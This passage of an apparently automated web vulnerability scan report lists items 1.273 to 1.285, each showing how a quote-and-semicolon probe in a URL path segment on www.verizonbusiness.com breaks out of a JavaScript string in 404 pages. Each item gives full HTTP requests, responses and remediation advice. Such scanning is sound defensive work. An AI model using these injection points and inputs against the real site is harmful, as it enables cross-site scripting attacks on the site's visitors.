Last-Modified: Wed, 17 Nov 2010 00:41:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc36ab";f94a793a7ac/security/compliance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.273. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334c1"%3b90e38324e5c was submitted in the REST URL parameter 2. This input was echoed as 334c1";90e38324e5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security334c1"%3b90e38324e5c/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security334c1";90e38324e5c/compliance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.274. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98497'%3bb6aa04ab29f was submitted in the REST URL parameter 2. This input was echoed as 98497';b6aa04ab29f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security98497'%3bb6aa04ab29f/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/security98497';b6aa04ab29f/compliance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.275. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c393"%3b1b44efc9356 was submitted in the REST URL parameter 3. This input was echoed as 6c393";1b44efc9356 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/compliance6c393"%3b1b44efc9356/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/compliance6c393";1b44efc9356/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.276. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f556'%3b76926c98ffb was submitted in the REST URL parameter 3. This input was echoed as 6f556';76926c98ffb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/compliance6f556'%3b76926c98ffb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43498
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/compliance6f556';76926c98ffb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.277. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f3"%3be040c4a5448 was submitted in the REST URL parameter 1. This input was echoed as e45f3";e040c4a5448 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse45f3"%3be040c4a5448/security/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productse45f3";e040c4a5448/security/dbir/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.278. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d88'%3bd2979abd42a was submitted in the REST URL parameter 1. This input was echoed as a4d88';d2979abd42a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa4d88'%3bd2979abd42a/security/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsa4d88';d2979abd42a/security/dbir/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.279. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86844'%3b6d7b65f2563 was submitted in the REST URL parameter 2. This input was echoed as 86844';6d7b65f2563 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security86844'%3b6d7b65f2563/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:14 GMT
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security86844';6d7b65f2563/dbir/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.280. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17ff"%3b0da22e90ce6 was submitted in the REST URL parameter 2. This input was echoed as e17ff";0da22e90ce6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securitye17ff"%3b0da22e90ce6/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securitye17ff";0da22e90ce6/dbir/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.281. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61590"%3b2634f074896 was submitted in the REST URL parameter 3. This input was echoed as 61590";2634f074896 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/dbir61590"%3b2634f074896/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:24 GMT
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/dbir61590";2634f074896/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.282. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcbd8'%3b2739f8fe961 was submitted in the REST URL parameter 3. This input was echoed as fcbd8';2739f8fe961 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/dbirfcbd8'%3b2739f8fe961/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/dbirfcbd8';2739f8fe961/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.283. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c02'%3bb0cbf4d2de8 was submitted in the REST URL parameter 1. This input was echoed as 49c02';b0cbf4d2de8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products49c02'%3bb0cbf4d2de8/security/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products49c02';b0cbf4d2de8/security/icsa-labs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.284. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23105"%3b261e89ec928 was submitted in the REST URL parameter 1. This input was echoed as 23105";261e89ec928 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products23105"%3b261e89ec928/security/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:58 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products23105";261e89ec928/security/icsa-labs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.285. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31165"%3ba248f0d3063 was submitted in the REST URL parameter 2. This input was echoed as 31165";a248f0d3063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security31165"%3ba248f0d3063/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
